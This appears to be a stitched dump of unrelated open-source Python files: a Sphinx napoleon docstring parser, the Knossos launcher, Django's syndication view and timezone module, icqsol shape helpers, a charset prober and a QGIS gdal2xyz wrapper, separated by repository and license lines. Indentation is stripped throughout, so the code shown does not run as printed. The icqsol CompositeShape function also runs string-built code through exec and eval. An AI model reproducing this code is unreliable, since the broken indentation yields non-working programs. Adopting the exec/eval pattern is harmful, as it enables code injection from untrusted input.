def _parse_returns_section(self, section):
fields = self._consume_returns_section()
multi = len(fields) > 1
if multi:
use_rtype = False
else:
use_rtype = self._config.napoleon_use_rtype
lines = []
for _name, _type, _desc in fields:
if use_rtype:
field = self._format_field(_name, '', _desc)
else:
field = self._format_field(_name, _type, _desc)
if multi:
if lines:
lines.extend(self._format_block(' * ', field))
else:
lines.extend(self._format_block(':returns: * ', field))
else:
lines.extend(self._format_block(':returns: ', field))
if _type and use_rtype:
lines.extend([':rtype: %s' % _type, ''])
if lines and lines[-1]:
lines.append('')
return lines
def _parse_see_also_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('seealso', lines)
def _parse_warning_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('warning', lines)
def _parse_warns_section(self, section):
return self._format_fields('Warns', self._consume_fields())
def _parse_yields_section(self, section):
fields = self._consume_returns_section()
return self._format_fields('Yields', fields)
def _partition_field_on_colon(self, line):
before_colon = []
after_colon = []
colon = ''
found_colon = False
for i, source in enumerate(_xref_regex.split(line)):
if found_colon:
after_colon.append(source)
else:
if (i % 2) == 0 and ":" in source:
found_colon = True
before, colon, after = source.partition(":")
before_colon.append(before)
after_colon.append(after)
else:
before_colon.append(source)
return ("".join(before_colon).strip(),
colon,
"".join(after_colon).strip())
def _strip_empty(self, lines):
if lines:
start = -1
for i, line in enumerate(lines):
if line:
start = i
break
if start == -1:
lines = []
end = -1
for i in reversed(range(len(lines))):
line = lines[i]
if line:
end = i
break
if start > 0 or end + 1 < len(lines):
lines = lines[start:end + 1]
return lines
class NumpyDocstring(GoogleDocstring):
"""Convert NumPy style docstrings to reStructuredText.
Parameters
----------
docstring : str or List[str]
The docstring to parse, given either as a string or split into
individual lines.
config : Optional[sphinxcontrib.napoleon.Config or sphinx.config.Config]
The configuration settings to use. If not given, defaults to the
config object on `app`; or if `app` is not given defaults to the
a new `sphinxcontrib.napoleon.Config` object.
See Also
--------
:class:`sphinxcontrib.napoleon.Config`
Other Parameters
----------------
app : Optional[sphinx.application.Sphinx]
Application object representing the Sphinx process.
what : Optional[str]
A string specifying the type of the object to which the docstring
belongs. Valid values: "module", "class", "exception", "function",
"method", "attribute".
name : Optional[str]
The fully qualified name of the object.
obj : module, class, exception, function, method, or attribute
The object to which the docstring belongs.
options : Optional[sphinx.ext.autodoc.Options]
The options given to the directive: an object with attributes
inherited_members, undoc_members, show_inheritance and noindex that
are True if the flag option of same name was given to the auto
directive.
Example
-------
>>> from sphinxcontrib.napoleon import Config
>>> config = Config(napoleon_use_param=True, napoleon_use_rtype=True)
>>> docstring = '''One line summary.
...
... Extended description.
...
... Parameters
... ----------
... arg1 : int
... Description of `arg1`
... arg2 : str
... Description of `arg2`
... Returns
... -------
... str
... Description of return value.
... '''
>>> print(NumpyDocstring(docstring, config))
One line summary.
<BLANKLINE>
Extended description.
<BLANKLINE>
:param arg1: Description of `arg1`
:type arg1: int
:param arg2: Description of `arg2`
:type arg2: str
<BLANKLINE>
:returns: Description of return value.
:rtype: str
<BLANKLINE>
Methods
-------
__str__()
Return the parsed docstring in reStructuredText format.
Returns
-------
str
UTF-8 encoded version of the docstring.
__unicode__()
Return the parsed docstring in reStructuredText format.
Returns
-------
unicode
Unicode version of the docstring.
lines()
Return the parsed lines of the docstring in reStructuredText format.
Returns
-------
List[str]
The lines of the docstring in a list.
"""
def __init__(self, docstring, config=None, app=None, what='', name='',
obj=None, options=None):
self._directive_sections = ['.. index::']
super(NumpyDocstring, self).__init__(docstring, config, app, what,
name, obj, options)
def _consume_field(self, parse_type=True, prefer_type=False):
line = next(self._line_iter)
if parse_type:
_name, _, _type = self._partition_field_on_colon(line)
else:
_name, _type = line, ''
_name, _type = _name.strip(), _type.strip()
if prefer_type and not _type:
_type, _name = _name, _type
if _name[:2] == '**':
_name = r'\*\*'+_name[2:]
elif _name[:1] == '*':
_name = r'\*'+_name[1:]
indent = self._get_indent(line)
_desc = self._dedent(self._consume_indented_block(indent + 1))
_desc = self.__class__(_desc, self._config).lines()
return _name, _type, _desc
def _consume_returns_section(self):
return self._consume_fields(prefer_type=True)
def _consume_section_header(self):
section = next(self._line_iter)
if not _directive_regex.match(section):
# Consume the header underline
next(self._line_iter)
return section
def _is_section_break(self):
line1, line2 = self._line_iter.peek(2)
return (not self._line_iter.has_next() or
self._is_section_header() or
['', ''] == [line1, line2] or
(self._is_in_section and
line1 and
not self._is_indented(line1, self._section_indent)))
def _is_section_header(self):
section, underline = self._line_iter.peek(2)
section = section.lower()
if section in self._sections and isinstance(underline, string_types):
return bool(_numpy_section_regex.match(underline))
elif self._directive_sections:
if _directive_regex.match(section):
for directive_section in self._directive_sections:
if section.startswith(directive_section):
return True
return False
_name_rgx = re.compile(r"^\s*(:(?P<role>\w+):`(?P<name>[a-zA-Z0-9_.-]+)`|"
r" (?P<name2>[a-zA-Z0-9_.-]+))\s*", re.X)
def _parse_see_also_section(self, section):
lines = self._consume_to_next_section()
try:
return self._parse_numpydoc_see_also_section(lines)
except ValueError:
return self._format_admonition('seealso', lines)
def _parse_numpydoc_see_also_section(self, content):
"""
Derived from the NumpyDoc implementation of _parse_see_also.
See Also
--------
func_name : Descriptive text
continued text
another_func_name : Descriptive text
func_name1, func_name2, :meth:`func_name`, func_name3
"""
items = []
def parse_item_name(text):
"""Match ':role:`name`' or 'name'"""
m = self._name_rgx.match(text)
if m:
g = m.groups()
if g[1] is None:
return g[3], None
else:
return g[2], g[1]
raise ValueError("%s is not a item name" % text)
def push_item(name, rest):
if not name:
return
name, role = parse_item_name(name)
items.append((name, list(rest), role))
del rest[:]
current_func = None
rest = []
for line in content:
if not line.strip():
continue
m = self._name_rgx.match(line)
if m and line[m.end():].strip().startswith(':'):
push_item(current_func, rest)
current_func, line = line[:m.end()], line[m.end():]
rest = [line.split(':', 1)[1].strip()]
if not rest[0]:
rest = []
elif not line.startswith(' '):
push_item(current_func, rest)
current_func = None
if ',' in line:
for func in line.split(','):
if func.strip():
push_item(func, [])
elif line.strip():
current_func = line
elif current_func is not None:
rest.append(line.strip())
push_item(current_func, rest)
if not items:
return []
roles = {
'method': 'meth',
'meth': 'meth',
'function': 'func',
'func': 'func',
'class': 'class',
'exception': 'exc',
'exc': 'exc',
'object': 'obj',
'obj': 'obj',
'module': 'mod',
'mod': 'mod',
'data': 'data',
'constant': 'const',
'const': 'const',
'attribute': 'attr',
'attr': 'attr'
}
if self._what is None:
func_role = 'obj'
else:
func_role = roles.get(self._what, '')
lines = []
last_had_desc = True
for func, desc, role in items:
if role:
link = ':%s:`%s`' % (role, func)
elif func_role:
link = ':%s:`%s`' % (func_role, func)
else:
link = "`%s`_" % func
if desc or last_had_desc:
lines += ['']
lines += [link]
else:
lines[-1] += ", %s" % link
if desc:
lines += self._indent([' '.join(desc)])
last_had_desc = True
else:
last_had_desc = False
lines += ['']
return self._format_admonition('seealso', lines)
| apache-2.0 |
MjnMixael/knossos | knossos/__main__.py | 1 | 3121 | #!/usr/bin/python
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
if __package__ is None and not hasattr(sys, 'frozen'):
import os.path
path = os.path.realpath(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(os.path.dirname(path)))
if len(sys.argv) > 1 and sys.argv[1] == '--cpuinfo':
# We don't need to initialize knossos if we only need to fetch the CPU info.
import json
from knossos.third_party import cpuinfo
info = None
try:
info = cpuinfo.get_cpu_info()
except Exception:
from knossos.launcher import logging
logging.exception('Failed to retrieve CPU info.')
print(json.dumps(info))
elif len(sys.argv) > 1 and sys.argv[1] == '--run-cpuid':
from knossos.third_party import cpuinfo
print(cpuinfo._actual_get_cpu_info_from_cpuid())
elif len(sys.argv) > 1 and sys.argv[1] == '--deviceinfo':
import json
from knossos import clibs
clibs.init_sdl()
clibs.init_openal()
if clibs.can_detect_audio():
audio_devs = clibs.list_audio_devs()
else:
audio_devs = None
print(json.dumps({
'modes': clibs.get_modes(),
'audio_devs': audio_devs,
'joysticks': clibs.list_joysticks()
}))
elif len(sys.argv) > 1 and sys.argv[1] == '--fso-config-path':
from knossos import clibs
clibs.init_sdl()
print(clibs.get_config_path())
elif len(sys.argv) > 1 and sys.argv[1] == '--lib-paths':
import json
from knossos import clibs, center
if len(sys.argv) > 3:
if sys.argv[2] == 'auto':
center.settings['sdl2_path'] = None
else:
center.settings['sdl2_path'] = sys.argv[2]
if sys.argv[3] == 'auto':
center.settings['openal_path'] = None
else:
center.settings['openal_path'] = sys.argv[3]
try:
clibs.init_sdl()
except Exception:
clibs.sdl = None
try:
clibs.init_openal()
except Exception:
clibs.acl = None
if center.settings['sdl2_path'] and clibs.sdl:
if clibs.sdl._name != center.settings['sdl2_path']:
clibs.sdl = None
if center.settings['openal_path'] and clibs.alc:
if clibs.alc._name != center.settings['openal_path']:
clibs.alc = None
print(json.dumps({
'sdl2': clibs.sdl._name if clibs.sdl else None,
'openal': clibs.alc._name if clibs.alc else None
}))
else:
from knossos import launcher
launcher.main()
| apache-2.0 |
diegoguimaraes/django | django/contrib/syndication/views.py | 31 | 8809 | from __future__ import unicode_literals
from calendar import timegm
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.http import HttpResponse, Http404
from django.template import loader, TemplateDoesNotExist, RequestContext
from django.utils import feedgenerator
from django.utils.encoding import force_text, iri_to_uri, smart_text
from django.utils.html import escape
from django.utils.http import http_date
from django.utils import six
from django.utils.timezone import get_default_timezone, is_naive, make_aware
def add_domain(domain, url, secure=False):
protocol = 'https' if secure else 'http'
if url.startswith('//'):
# Support network-path reference (see #16753) - RSS requires a protocol
url = '%s:%s' % (protocol, url)
elif not (url.startswith('http://')
or url.startswith('https://')
or url.startswith('mailto:')):
url = iri_to_uri('%s://%s%s' % (protocol, domain, url))
return url
class FeedDoesNotExist(ObjectDoesNotExist):
pass
class Feed(object):
feed_type = feedgenerator.DefaultFeed
title_template = None
description_template = None
def __call__(self, request, *args, **kwargs):
try:
obj = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
raise Http404('Feed object does not exist.')
feedgen = self.get_feed(obj, request)
response = HttpResponse(content_type=feedgen.mime_type)
if hasattr(self, 'item_pubdate') or hasattr(self, 'item_updateddate'):
# if item_pubdate or item_updateddate is defined for the feed, set
# header so as ConditionalGetMiddleware is able to send 304 NOT MODIFIED
response['Last-Modified'] = http_date(
timegm(feedgen.latest_post_date().utctimetuple()))
feedgen.write(response, 'utf-8')
return response
def item_title(self, item):
# Titles should be double escaped by default (see #6533)
return escape(force_text(item))
def item_description(self, item):
return force_text(item)
def item_link(self, item):
try:
return item.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
'Give your %s class a get_absolute_url() method, or define an '
'item_link() method in your Feed class.' % item.__class__.__name__
)
def __get_dynamic_attr(self, attname, obj, default=None):
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr):
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2: # one argument is 'self'
return attr(obj)
else:
return attr()
return attr
def feed_extra_kwargs(self, obj):
"""
Returns an extra keyword arguments dictionary that is used when
initializing the feed generator.
"""
return {}
def item_extra_kwargs(self, item):
"""
Returns an extra keyword arguments dictionary that is used with
the `add_item` call of the feed generator.
"""
return {}
def get_object(self, request, *args, **kwargs):
return None
def get_context_data(self, **kwargs):
"""
Returns a dictionary to use as extra context if either
``self.description_template`` or ``self.item_template`` are used.
Default implementation preserves the old behavior
of using {'obj': item, 'site': current_site} as the context.
"""
return {'obj': kwargs.get('item'), 'site': kwargs.get('site')}
def get_feed(self, obj, request):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
current_site = get_current_site(request)
link = self.__get_dynamic_attr('link', obj)
link = add_domain(current_site.domain, link, request.is_secure())
feed = self.feed_type(
title=self.__get_dynamic_attr('title', obj),
subtitle=self.__get_dynamic_attr('subtitle', obj),
link=link,
description=self.__get_dynamic_attr('description', obj),
language=settings.LANGUAGE_CODE,
feed_url=add_domain(
current_site.domain,
self.__get_dynamic_attr('feed_url', obj) or request.path,
request.is_secure(),
),
author_name=self.__get_dynamic_attr('author_name', obj),
author_link=self.__get_dynamic_attr('author_link', obj),
author_email=self.__get_dynamic_attr('author_email', obj),
categories=self.__get_dynamic_attr('categories', obj),
feed_copyright=self.__get_dynamic_attr('feed_copyright', obj),
feed_guid=self.__get_dynamic_attr('feed_guid', obj),
ttl=self.__get_dynamic_attr('ttl', obj),
**self.feed_extra_kwargs(obj)
)
title_tmp = None
if self.title_template is not None:
try:
title_tmp = loader.get_template(self.title_template)
except TemplateDoesNotExist:
pass
description_tmp = None
if self.description_template is not None:
try:
description_tmp = loader.get_template(self.description_template)
except TemplateDoesNotExist:
pass
for item in self.__get_dynamic_attr('items', obj):
context = self.get_context_data(item=item, site=current_site,
obj=obj, request=request)
if title_tmp is not None:
title = title_tmp.render(RequestContext(request, context))
else:
title = self.__get_dynamic_attr('item_title', item)
if description_tmp is not None:
description = description_tmp.render(RequestContext(request, context))
else:
description = self.__get_dynamic_attr('item_description', item)
link = add_domain(
current_site.domain,
self.__get_dynamic_attr('item_link', item),
request.is_secure(),
)
enc = None
enc_url = self.__get_dynamic_attr('item_enclosure_url', item)
if enc_url:
enc = feedgenerator.Enclosure(
url=smart_text(enc_url),
length=smart_text(self.__get_dynamic_attr('item_enclosure_length', item)),
mime_type=smart_text(self.__get_dynamic_attr('item_enclosure_mime_type', item))
)
author_name = self.__get_dynamic_attr('item_author_name', item)
if author_name is not None:
author_email = self.__get_dynamic_attr('item_author_email', item)
author_link = self.__get_dynamic_attr('item_author_link', item)
else:
author_email = author_link = None
tz = get_default_timezone()
pubdate = self.__get_dynamic_attr('item_pubdate', item)
if pubdate and is_naive(pubdate):
pubdate = make_aware(pubdate, tz)
updateddate = self.__get_dynamic_attr('item_updateddate', item)
if updateddate and is_naive(updateddate):
updateddate = make_aware(updateddate, tz)
feed.add_item(
title=title,
link=link,
description=description,
unique_id=self.__get_dynamic_attr('item_guid', item, link),
unique_id_is_permalink=self.__get_dynamic_attr(
'item_guid_is_permalink', item),
enclosure=enc,
pubdate=pubdate,
updateddate=updateddate,
author_name=author_name,
author_email=author_email,
author_link=author_link,
categories=self.__get_dynamic_attr('item_categories', item),
item_copyright=self.__get_dynamic_attr('item_copyright', item),
**self.item_extra_kwargs(item)
)
return feed
| bsd-3-clause |
gregvonkuster/icqsol | shapes/icqShape.py | 2 | 2584 | #!/usr/bin/env python
"""
@brief A base class for constructing shapes
@author [email protected]
"""
from __future__ import print_function
from csg.core import CSG
from csg.geom import Vector
import numpy
DEFAULTS = dict(origin=[0.0, 0.0, 0.0],
lengths=[1.0, 1.0, 1.0],
radius=1.0,
angle=90.0,
n_theta=16,
n_phi=8)
def Box(origin, lengths):
"""
Create box
@param origin/low end of the box
@param lengths lengths in x, y, and z
"""
center = [origin[i] + 0.5*lengths[i] for i in range(len(origin))]
radius = [0.5*le for le in lengths]
return CSG.cube(center=center, radius=radius)
def Cone(radius, origin, lengths, n_theta=16):
"""
Create cone
@param radius radius
@param origin location of the focal point
@param lengths lengths of the cone
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cone(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Cylinder(radius, origin, lengths, n_theta=16):
"""
Create cylinder
@param radius radius
@param origin center of low end disk
@param lengths lengths of the cylinder along each axis
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cylinder(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Sphere(radius, origin, n_theta=16, n_phi=8):
"""
Create sphere
@param radius radius
@param origin center of the sphere
@param n_theta number of theta cells
@param n_phi number of azimuthal cells
"""
return CSG.sphere(center=origin,
radius=radius,
slices=n_theta,
stacks=n_phi)
def CompositeShape(shape_tuples=[], expression=''):
"""
@param shape_tuples list of (variable_name, shape) pairs
@param expression expression involving +, -, and * operations.
"""
for i in range(len(shape_tuples)):
varName = shape_tuples[i][0]
cmd = '{0} = shape_tuples[{1}][1]'.format(varName, i)
exec(cmd)
return eval(expression)
| mit |
Vishruit/DDP_models | tf1/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcsgroupprober.py | 2936 | 3291 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
SingleByteCharSetProber(MacCyrillicModel),
SingleByteCharSetProber(Ibm866Model),
SingleByteCharSetProber(Ibm855Model),
SingleByteCharSetProber(Latin7GreekModel),
SingleByteCharSetProber(Win1253GreekModel),
SingleByteCharSetProber(Latin5BulgarianModel),
SingleByteCharSetProber(Win1251BulgarianModel),
SingleByteCharSetProber(Latin2HungarianModel),
SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
]
hebrewProber = HebrewProber()
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrewProber)
hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber)
self._mProbers.extend([hebrewProber, logicalHebrewProber,
visualHebrewProber])
self.reset()
| gpl-3.0 |
siliconsmiley/QGIS | python/plugins/processing/algs/gdal/gdal2xyz.py | 1 | 2574 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdal2xyz.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputTable
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
class gdal2xyz(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
OUTPUT = 'OUTPUT'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('gdal2xyz')
self.group, self.i18n_group = self.trAlgorithm('[GDAL] Conversion')
self.addParameter(ParameterRaster(
self.INPUT, self.tr('Input layer'), False))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 9999, 1))
self.addOutput(OutputTable(self.OUTPUT, self.tr('xyz')))
def getConsoleCommands(self):
arguments = []
arguments.append('-band')
arguments.append(unicode(self.getParameterValue(self.BAND)))
arguments.append('-csv')
arguments.append(self.getParameterValue(self.INPUT))
arguments.append(self.getOutputValue(self.OUTPUT))
commands = []
if isWindows():
commands = ['cmd.exe', '/C ', 'gdal2xyz.bat',
GdalUtils.escapeAndJoin(arguments)]
else:
commands = ['gdal2xyz.py', GdalUtils.escapeAndJoin(arguments)]
return commands
| gpl-2.0 |
IKholopov/HackUPC2017 | hackupc/env/lib/python3.5/site-packages/django/utils/timezone.py | 57 | 11145 | """
Timezone-related classes and functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
import sys
import time as _time
from datetime import datetime, timedelta, tzinfo
from threading import local
from django.conf import settings
from django.utils import lru_cache, six
from django.utils.decorators import ContextDecorator
try:
import pytz
except ImportError:
pytz = None
__all__ = [
'utc', 'get_fixed_timezone',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class FixedOffset(tzinfo):
"""
Fixed offset in minutes east from UTC. Taken from Python's docs.
Kept as close as possible to the reference version. __init__ was changed
to make its arguments optional, according to Python's requirement that
tzinfo subclasses can be instantiated without arguments.
"""
def __init__(self, offset=None, name=None):
if offset is not None:
self.__offset = timedelta(minutes=offset)
if name is not None:
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time. Taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept as close as possible to the reference version. __init__ was added to
delay the computation of STDOFFSET, DSTOFFSET and DSTDIFF which is
performed at import time in the example.
Subclasses contain further improvements.
"""
def __init__(self):
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
if not hasattr(exc, '__traceback__'):
exc.__traceback__ = sys.exc_info()[2]
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
def get_fixed_timezone(offset):
"""
Returns a tzinfo instance with a fixed offset from UTC.
"""
if isinstance(offset, timedelta):
offset = offset.seconds // 60
sign = '-' if offset < 0 else '+'
hhmm = '%02d%02d' % divmod(abs(offset), 60)
name = sign + hhmm
return FixedOffset(offset, name)
# In order to avoid accessing settings at compile time,
# wrap the logic in a function and cache the result.
@lru_cache.lru_cache()
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
"""
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
return pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
return LocalTimezone()
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(ContextDecorator):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
def __enter__(self):
self.old_timezone = getattr(_active, 'value', None)
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (
isinstance(value, datetime) and
(settings.USE_TZ if use_tz is None else use_tz) and
not is_naive(value) and
getattr(value, 'convert_to_local_time', True)
)
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is None
def make_aware(value, timezone=None, is_dst=None):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if timezone is None:
timezone = get_current_timezone()
if hasattr(timezone, 'localize'):
# This method is available for pytz time zones.
return timezone.localize(value, is_dst=is_dst)
else:
# Check that we won't overwrite the timezone of an aware datetime.
if is_aware(value):
raise ValueError(
"make_aware expects a naive datetime, got %s" % value)
# This may be wrong around DST changes!
return value.replace(tzinfo=timezone)
def make_naive(value, timezone=None):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value.replace(tzinfo=None)
| apache-2.0 |
ssanderson/numpy | numpy/f2py/cb_rules.py | 153 | 22230 | #!/usr/bin/env python
"""
Build call-back mechanism for f2py2e.
Copyright 2000 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
